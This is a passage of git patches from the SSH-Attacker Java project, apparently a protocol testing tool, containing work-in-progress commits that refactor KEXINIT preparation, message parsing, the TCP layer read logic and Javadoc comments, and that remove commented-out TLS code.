+ getObject() + .setServerHostKeyAlgorithms( + chooser.getServerSupportedHostKeyAlgorithms(), true); + getObject() + .setEncryptionAlgorithmsClientToServer( + chooser.getServerSupportedEncryptionAlgorithmsClientToServer(), true); + getObject() + .setEncryptionAlgorithmsServerToClient( + chooser.getServerSupportedEncryptionAlgorithmsServerToClient(), true); + getObject() + .setMacAlgorithmsClientToServer( + chooser.getServerSupportedMacAlgorithmsClientToServer(), true); + getObject() + .setMacAlgorithmsServerToClient( + chooser.getServerSupportedMacAlgorithmsServerToClient(), true); + getObject() + .setCompressionMethodsClientToServer( + chooser.getServerSupportedCompressionMethodsClientToServer(), true); + getObject() + .setCompressionMethodsServerToClient( + chooser.getServerSupportedCompressionMethodsServerToClient(), true); + getObject() + .setLanguagesClientToServer( + chooser.getServerSupportedLanguagesClientToServer() + .toArray(new String[0]), + true); + getObject() + .setLanguagesServerToClient( + chooser.getServerSupportedLanguagesServerToClient() + .toArray(new String[0]), + true); + getObject() + .setFirstKeyExchangePacketFollows( + chooser.getServerFirstKeyExchangePacketFollows()); + getObject().setReserved(chooser.getServerReserved()); + + chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setServerKeyExchangeInit(getObject()); + } + }*/ + + public void prepareMessageSpecificContents() { + SshContext sshContext = chooser.getContext().getSshContext(); + if (sshContext.isClient()) { + getObject().setCookie(chooser.getClientCookie()); + getObject() + .setKeyExchangeAlgorithms( + chooser.getClientSupportedKeyExchangeAlgorithms(), true); + getObject() + .setServerHostKeyAlgorithms( + chooser.getClientSupportedHostKeyAlgorithms(), true); + getObject() + .setEncryptionAlgorithmsClientToServer( + chooser.getClientSupportedEncryptionAlgorithmsClientToServer(), true); + getObject() + .setEncryptionAlgorithmsServerToClient( + chooser.getClientSupportedEncryptionAlgorithmsServerToClient(), true); + getObject() + .setMacAlgorithmsClientToServer( + chooser.getClientSupportedMacAlgorithmsClientToServer(), true); + getObject() + .setMacAlgorithmsServerToClient( + chooser.getClientSupportedMacAlgorithmsServerToClient(), true); + getObject() + .setCompressionMethodsClientToServer( + chooser.getClientSupportedCompressionMethodsClientToServer(), true); + getObject() + .setCompressionMethodsServerToClient( + chooser.getClientSupportedCompressionMethodsServerToClient(), true); + getObject() + .setLanguagesClientToServer( + chooser.getClientSupportedLanguagesClientToServer() + .toArray(new String[0]), + true); + getObject() + .setLanguagesServerToClient( + chooser.getClientSupportedLanguagesServerToClient() + .toArray(new String[0]), + true); + getObject() + .setFirstKeyExchangePacketFollows( + chooser.getClientFirstKeyExchangePacketFollows()); + getObject().setReserved(chooser.getClientReserved()); + + chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setClientKeyExchangeInit(getObject()); } else { getObject().setCookie(chooser.getServerCookie()); getObject() @@ -106,10 +202,10 @@ public void prepareMessageSpecificContents() { chooser.getServerFirstKeyExchangePacketFollows()); getObject().setReserved(chooser.getServerReserved()); - /*chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setServerKeyExchangeInit(getObject());*/ + chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setServerKeyExchangeInit(getObject()); } } } From 036d0db7ba445e378d5d3e367542fcfded97b741 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 15 Jul 2023 00:49:00 +0200 Subject: [PATCH 036/176] wip: fixing failed tests --- .../core/layer/impl/SSH2Layer.java | 1 - .../parser/UserAuthBannerMessageParser.java | 3 ++- .../common/CyclicParserSerializerTest.java | 25 +++++++++++++++++++ 3 files changed, 27 insertions(+), 2 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 6208b6918..90ca62b69 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -197,7 +197,6 @@ private void processMessage( message.setCompleteResultingMessage(serializedMessage); collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index 9980d4737..00487f148 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -34,7 +34,8 @@ public UserAuthBannerMessageParser(InputStream stream) { @Override public void parse(UserAuthBannerMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseData(message); + parseProtocolMessageContents(message); + // parseData(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java index 5c654b931..6078343eb 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java @@ -159,6 +159,31 @@ public void execute() { // Parse the serialized message back into a new instance ProtocolMessage parsedMessage = null; + + try { + Constructor someMessageConstructor; + + someMessageConstructor = getDefaultMessageConstructor(messageClass); + if (someMessageConstructor == null) { + fail( + "Subclass '" + + messageClassName + + "' does not have the needed constructor."); + } else { + parsedMessage = (ProtocolMessage) someMessageConstructor.newInstance(); + } + } catch (SecurityException + | InstantiationException + | IllegalAccessException + | IllegalArgumentException + | InvocationTargetException e) { + LOGGER.fatal(e); + fail( + "Unable to construct message instance for subclass '" + + messageClassName + + "'"); + } + InputStream streamedMessage = new ByteArrayInputStream(serializedMessage); try { Parser parser = message.getParser(context, streamedMessage); From 19f26fc4aa9ac6e2c4b99bb3078f37f22c73c96c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 15 Jul 2023 00:52:22 +0200 Subject: [PATCH 037/176] wip: fixing MitM --- SSH-Mitm/pom.xml | 2 +- .../src/main/java/de/rub/nds/sshattacker/mitm/main/SshMitm.java | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/SSH-Mitm/pom.xml b/SSH-Mitm/pom.xml index c8ab167d3..8fa6d9619 100644 --- a/SSH-Mitm/pom.xml +++ b/SSH-Mitm/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT ssh-mitm diff --git a/SSH-Mitm/src/main/java/de/rub/nds/sshattacker/mitm/main/SshMitm.java b/SSH-Mitm/src/main/java/de/rub/nds/sshattacker/mitm/main/SshMitm.java index 2ae5b6106..4f4685d92 100644 --- a/SSH-Mitm/src/main/java/de/rub/nds/sshattacker/mitm/main/SshMitm.java +++ b/SSH-Mitm/src/main/java/de/rub/nds/sshattacker/mitm/main/SshMitm.java @@ -14,7 +14,7 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; From 12c931df23ad1d242e5444c163555031e6dc4e2e Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 15 Jul 2023 01:25:53 +0200 Subject: [PATCH 038/176] wip: fixing some doc-Warnings --- .idea/compiler.xml | 7 +- .../core/crypto/ec/EllipticCurve.java | 4 + .../sshattacker/core/layer/data/Parser.java | 2 +- .../core/layer/data/Preparator.java | 2 +- .../core/layer/impl/SSH2Layer.java | 318 +----------------- .../parser/AuthenticationMessageParser.java | 2 +- .../parser/ConnectionMessageParser.java | 2 +- 7 files changed, 12 insertions(+), 325 deletions(-) diff --git a/.idea/compiler.xml b/.idea/compiler.xml index 00dcbef5f..9a79dd150 100644 --- a/.idea/compiler.xml +++ b/.idea/compiler.xml @@ -9,15 +9,10 @@ + - - - - - - \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java index d213cf620..3cac16eb2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java @@ -57,6 +57,7 @@ protected EllipticCurve( * one point is not on the curve and the calculations would require dividing by 0, the result * will be the point at infinity. * + * @return result of p+q * @param p A point whose coordinates are elements of the field over which the curve is defined * or the point at infinity. * @param q A point whose coordinates are elements of the field over which the curve is defined @@ -86,8 +87,10 @@ public Point add(Point p, Point q) { * Returns k*p on this curve. If the point is not on the curve and the calculations would * require dividing by 0, the result will be the point at infinity. * + * @param k integer which defines, how often to multiply the point * @param p A point whose coordinates are elements of the field over which the curve is defined * or the point at infinity. + * @return result of multiplication k*p */ public Point mult(BigInteger k, Point p) { if (k.compareTo(BigInteger.ZERO) < 0) { @@ -114,6 +117,7 @@ public Point mult(BigInteger k, Point p) { * Returns the unique point q with the property p + q = O on this curve. If p is null the result * will be null. * + * @return unique point q * @param p A point whose coordinates are elements of the field over which the curve is defined * or the point at infinity. */ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java index 8bab2ef38..f70c7e42a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java @@ -206,7 +206,7 @@ protected String parseByteString(int length, Charset charset) { /** * TODO: This can break get already parsed - not so nice * - * @return + * @return return Inputstream */ protected InputStream getStream() { return stream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java index 80c80ec18..f86363db9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java @@ -37,7 +37,7 @@ public Preparator(Chooser chooser, T object) { * the client parsed this Method. This is mostly only useful if you are reparsing or doing * something really crazy. For any normal use case this should be set to false; * - * @param clientMode + * @param clientMode see above */ public void prepareAfterParse(boolean clientMode) {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 90ca62b69..781b985be 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -78,54 +78,9 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { collectedMessageStream = new ByteArrayOutputStream(); - /* - if (containerAlreadyUsedByHigherLayer(message) - || !prepareDataContainer(message, context)) { - continue; - } - */ - - /*MessageLayer messageLayer = context.getMessageLayer(); - AbstractPacket packet = messageLayer.serialize(message); - Preparator preparator = packet.getPreparator(context); - preparator.prepare(); - Serializer serializer = packet.getSerializer(context); - byte[] serializedMessage = serializer.serialize();*/ LOGGER.debug("[bro] here i am with sending the message"); - /* - LOGGER.debug( - "[bro] MESSAGE: {} {}", - message.getProtocolMessageType(), - message.getCompleteResultingMessage().getValue());*/ - - /* - ProtocolMessagePreparator preparator = message.getPreparator(context); - preparator.prepare(); - - ProtocolMessageSerializer serializer = message.getSerializer(context); - LOGGER.debug("[bro] got serializer"); - byte[] serializedMessage = serializer.serialize(); - LOGGER.debug("[bro] serializied the message"); - message.setCompleteResultingMessage(serializedMessage); - LOGGER.debug("[bro] set complete message"); - ProtocolMessageType protocolMessageType = null; - protocolMessageType = message.getProtocolMessageType(); - - LOGGER.debug( - "[bro] Sending Data {} on lower layer {}", - serializedMessage, - getLowerLayer().getLayerType()); - - getLowerLayer() - .sendData(new PacketLayerHint(protocolMessageType), serializedMessage); - */ - - // Es gibt erstmal keine Handshake-Messages mit einer Spezialbehandlung bei SSH - /*if (!message.isHandshakeMessage()) { - // only handshake messages may share a record - flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); - }*/ + runningProtocolMessageType = message.getProtocolMessageType(); processMessage(message, collectedMessageStream); addProducedContainer(message); @@ -135,18 +90,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (handler instanceof MessageSentHandler) { ((MessageSentHandler) handler).adjustContextAfterMessageSent(); } - - /*if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { - ProtocolMessageHandler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - }*/ } } @@ -157,30 +100,8 @@ public LayerProcessingResult sendConfiguration() throws IOException { } LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); - // hand remaining serialized to record layer - // flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); - return getLayerResult(); - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); - } - } - return getLayerResult();*/ + return getLayerResult(); } private void processMessage( @@ -240,96 +161,12 @@ public LayerProcessingResult receiveData() { } return getLayerResult(); - - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); - } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - - } catch (TimeoutException ex) { - LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); - } - - return getLayerResult();*/ } - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ - public void readMessageForHint(PacketLayerHint hint) { switch (hint.getType()) { // use correct parser for the message - /* case ALERT: - readAlertProtocolData(); - break; - case APPLICATION_DATA: - readAppDataProtocolData(); - break; - case CHANGE_CIPHER_SPEC: - readCcsProtocolData(hint.getEpoch()); - break; - case HANDSHAKE: - readHandshakeProtocolData(); - break; - case HEARTBEAT: - readHeartbeatProtocolData(); - break; - case UNKNOWN: - readUnknownProtocolData(); - break;*/ + case AUTHENTICATION: readAuthenticationProtocolData(); break; @@ -925,103 +762,12 @@ private void readConnectionProtocolData() { readDataContainer(message, context); } - /*private void readAlertProtocolData() { - AlertMessage message = new AlertMessage(); - readDataContainer(message, context); - } - - private ApplicationMessage readAppDataProtocolData() { - ApplicationMessage message = new ApplicationMessage(); - readDataContainer(message, context); - getLowerLayer().removeDrainedInputStream(); - return message; - } - - private void readCcsProtocolData(Integer epoch) { - ChangeCipherSpecMessage message = new ChangeCipherSpecMessage(); - if (context.getSelectedProtocolVersion().isDTLS()) { - if (context.getDtlsReceivedChangeCipherSpecEpochs().contains(epoch) - && context.getConfig().isIgnoreRetransmittedCcsInDtls()) { - message.setAdjustContext(false); - } else { - context.addDtlsReceivedChangeCipherSpecEpochs(epoch); - } - } - readDataContainer(message, context); - } - - */ /** * Parses the handshake layer header from the given message and parses the encapsulated message * using the correct parser. * * @throws IOException */ - /* - private void readHandshakeProtocolData() { - byte[] readBytes = new byte[0]; - byte type; - int length; - byte[] payload; - HandshakeMessage handshakeMessage; - HintedInputStream handshakeStream; - try { - handshakeStream = getLowerLayer().getDataStream(); - type = handshakeStream.readByte(); - readBytes = ArrayConverter.concatenate(readBytes, new byte[] {type}); - handshakeMessage = - MessageFactory.generateHandshakeMessage( - HandshakeMessageType.getMessageType(type), context); - handshakeMessage.setType(type); - byte[] lengthBytes = - handshakeStream.readChunk(HandshakeByteLength.MESSAGE_LENGTH_FIELD); - length = ArrayConverter.bytesToInt(lengthBytes); - readBytes = ArrayConverter.concatenate(readBytes, lengthBytes); - handshakeMessage.setLength(length); - payload = handshakeStream.readChunk(length); - readBytes = ArrayConverter.concatenate(readBytes, payload); - - } catch (IOException ex) { - LOGGER.error("Could not parse message header. Setting bytes as unread: ", ex); - // not being able to parse the header leaves us with unreadable bytes - // append instead of replace because we can read multiple messages in one read action - setUnreadBytes(ArrayConverter.concatenate(this.getUnreadBytes(), readBytes)); - return; - } - Handler handler = handshakeMessage.getHandler(context); - handshakeMessage.setMessageContent(payload); - - try { - handshakeMessage.setCompleteResultingMessage( - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - length, HandshakeByteLength.MESSAGE_LENGTH_FIELD), - payload)); - Parser parser = handshakeMessage.getParser(context, new ByteArrayInputStream(payload)); - parser.parse(handshakeMessage); - Preparator preparator = handshakeMessage.getPreparator(context); - preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG - if (context.getChooser().getSelectedProtocolVersion().isDTLS()) { - handshakeMessage.setMessageSequence( - ((RecordLayerHint) handshakeStream.getHint()).getMessageSequence()); - } - handshakeMessage.getHandler(context).updateDigest(handshakeMessage, false); - handler.adjustContext(handshakeMessage); - addProducedContainer(handshakeMessage); - } catch (RuntimeException ex) { - // not being able to handle the handshake message results in an UnknownMessageContainer - UnknownHandshakeMessage message = new UnknownHandshakeMessage(); - message.setData(payload); - addProducedContainer(message); - } - } - - private void readHeartbeatProtocolData() { - HeartbeatMessage message = new HeartbeatMessage(); - readDataContainer(message, context); - }*/ - private void readUnknownProtocolData() { UnknownMessage message = new UnknownMessage(); readDataContainer(message, context); @@ -1040,64 +786,6 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException currentInputStream.extendStream(dataStream.readAllBytes()); } else if (dataStream.getHint() instanceof PacketLayerHint) { PacketLayerHint tempHint = (PacketLayerHint) dataStream.getHint(); - /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { - DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); - fragment.setEpoch(tempHint.getEpoch()); - DtlsHandshakeMessageFragmentParser parser = - fragment.getParser( - context, - new ByteArrayInputStream( - dataStream.readChunk(dataStream.available()))); - parser.parse(fragment); - fragment.setCompleteResultingMessage( - fragment.getSerializer(context).serialize()); - fragmentManager.addMessageFragment(fragment); - List uninterpretedMessageFragments = - fragmentManager.getOrderedCombinedUninterpretedMessageFragments( - true, false); - // run until we received a complete fragment - if (!uninterpretedMessageFragments.isEmpty()) { - DtlsHandshakeMessageFragment uninterpretedMessageFragment = - uninterpretedMessageFragments.get(0); - addProducedContainer(uninterpretedMessageFragment); - RecordLayerHint currentHint = - new RecordLayerHint( - uninterpretedMessageFragment.getProtocolMessageType(), - uninterpretedMessageFragment - .getMessageSequence() - .getValue()); - byte type = uninterpretedMessageFragment.getType().getValue(); - byte[] content = - uninterpretedMessageFragment.getMessageContent().getValue(); - byte[] message = - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - content.length, - HandshakeByteLength.MESSAGE_LENGTH_FIELD), - content); - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(message); - } else { - if (nextInputStream == null) { - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(message); - } - } else { - receiveMoreDataForHint(desiredHint); - } - } else { - currentInputStream = new HintedLayerInputStream(tempHint, this); - currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); - }*/ } } catch (TimeoutException ex) { LOGGER.debug(ex); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java index 11f3867bf..3e5ff46ac 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java @@ -20,7 +20,7 @@ public class AuthenticationMessageParser extends ProtocolMessageParser Date: Sun, 16 Jul 2023 14:13:03 +0200 Subject: [PATCH 039/176] wip: fixed client issue while reading VersionExchangeMessage --- .../core/layer/impl/SSH2Layer.java | 19 +++++ .../sshattacker/core/layer/impl/TcpLayer.java | 85 ++++++++++++------- 2 files changed, 75 insertions(+), 29 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 781b985be..0e8846545 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -118,6 +118,17 @@ private void processMessage( message.setCompleteResultingMessage(serializedMessage); collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); + + if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() + || message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { + message.getHandler(context).adjustContextAfterMessageSent(message); + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); + } } @Override @@ -234,6 +245,9 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_CHANNEL_SUCCESS: readChannelSuccessMessage(); break; + case SSH_MSG_IGNORE: + readIngoreMessage(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -645,6 +659,11 @@ private void readGlobalRequest() { } } + private void readIngoreMessage() { + ChannelSuccessMessage message = new ChannelSuccessMessage(); + readDataContainer(message, context); + } + private void readChannelSuccessMessage() { ChannelSuccessMessage message = new ChannelSuccessMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index f73135620..8d3ba4da6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -7,6 +7,8 @@ */ package de.rub.nds.sshattacker.core.layer.impl; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; @@ -17,6 +19,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; +import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.util.concurrent.TimeUnit; @@ -66,39 +69,63 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException /** Returns the inputStream associated with the TCP socket. */ @Override - public HintedInputStream getDataStream() { + public HintedInputStream getDataStream() throws IOException { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); - int retries = 0; - int maxRetries = 10; - LOGGER.debug( - "[bro] TCP-Layer is transmitting Datastream now with Timeout ", - getTransportHandler().getTimeout()); - // TODO: remove later, just for debugging - /* try { - TimeUnit.SECONDS.sleep(1); - } catch (InterruptedException e) { - throw new RuntimeException(e); - }*/ - - InputStream handlerStream = getTransportHandler().getInputStream(); - try { - while (handlerStream.available() == 0 && retries < maxRetries) { - handlerStream = getTransportHandler().getInputStream(); - try { - TimeUnit.MILLISECONDS.sleep(10); - } catch (InterruptedException e) { - throw new RuntimeException(e); + + if (context.getContext().getSshContext().isReceiveAsciiModeEnabled()) { + LOGGER.info("Recive in ASCII-Mode"); + byte[] receiveBuffer = new byte[0]; + byte[] readByte; + do { + readByte = context.getTransportHandler().fetchData(1); + receiveBuffer = ArrayConverter.concatenate(receiveBuffer, readByte); + } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); + LOGGER.info("Ended after got a new line"); + + currentInputStream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(receiveBuffer)); + return currentInputStream; + + // return receiveBuffer; + } else { + // return context.getTransportHandler().fetchData(); + + int retries = 0; + int maxRetries = 5; + LOGGER.debug( + "[bro] TCP-Layer is transmitting Datastream now with Timeout ", + getTransportHandler().getTimeout()); + // TODO: remove later, just for debugging + /* + try { + TimeUnit.SECONDS.sleep(1); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + */ + + InputStream handlerStream = getTransportHandler().getInputStream(); + try { + while (handlerStream.available() == 0 && retries < maxRetries) { + handlerStream = getTransportHandler().getInputStream(); + try { + TimeUnit.MILLISECONDS.sleep(10); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + retries++; + LOGGER.debug("got no stream in {}-trie", retries); } - retries++; - LOGGER.debug("got no stream in {}-trie", retries); + } catch (IOException e) { + throw new RuntimeException(e); } - } catch (IOException e) { - throw new RuntimeException(e); - } - currentInputStream = - new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); - return currentInputStream; + currentInputStream = + new HintedInputStreamAdapterStream( + null, getTransportHandler().getInputStream()); + return currentInputStream; + } } @Override From c484a3d335c37fad4a52fc9034da3f7d5f8ac354 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 16 Jul 2023 22:05:04 +0200 Subject: [PATCH 040/176] wip: cleanup stuff from old tls-layerstack --- .../core/layer/LayerStackFactory.java | 35 - .../layer/constant/ImplementedLayers.java | 3 - .../layer/constant/LayerConfiguration.java | 8 - .../core/layer/context/SshContext.java | 5 +- .../core/layer/impl/SSH2Layer.java | 8 +- .../sshattacker/core/layer/impl/TcpLayer.java | 9 - .../core/layer/impl/TransportLayer.java | 195 +--- .../sshattacker/core/state/SshContext2.java | 963 ------------------ .../core/workflow/action/MessageAction.java | 8 +- .../core/workflow/action/SshAction.java | 4 +- 10 files changed, 10 insertions(+), 1228 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java index c72dc9d4f..1916d045f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -30,43 +30,8 @@ public static LayerStack createLayerStack(LayerConfiguration type, Context conte LayerStack layerStack; SshContext sshContext = context.getSshContext(); TcpContext tcpContext = 